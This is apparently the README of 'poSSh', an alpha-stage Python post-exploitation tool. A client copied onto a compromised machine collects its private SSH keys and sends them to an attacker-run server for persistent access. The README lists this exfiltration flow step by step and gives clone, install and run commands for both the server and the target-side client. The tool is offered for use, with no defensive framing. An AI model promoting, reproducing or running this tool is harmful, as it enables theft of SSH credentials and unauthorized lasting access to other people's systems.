poSSh is a post-exploitation tool written in python. It uses the private key of target for persistence.(Alpha)
- Check for Internet Connection.
- Start server using wan(ipv4) address.
- Generate Security Key.
- Exchange Security key with Client.
- Get the Private SSh key(s) from client.
- Save the Private key.
- Save the logs.
- Connect to Server using Socket.
- Exchange Security key from Server.
- Get Private SSH key(s) from target.
- Send private key(s) to server.
- The tool is in alpha right now.
poSSh requires Python3 v3.8 or Greater to run.
Install the dependencies and start the server.
git clone https://github.com/sc4rfurry/poSSh.git
cd poSSh
pip3 install -r requirements.txt
python3 main.py [port]
Just copy the client from poSSh-client/client.py to the target machine.
python3 client.py [server_ip] [port]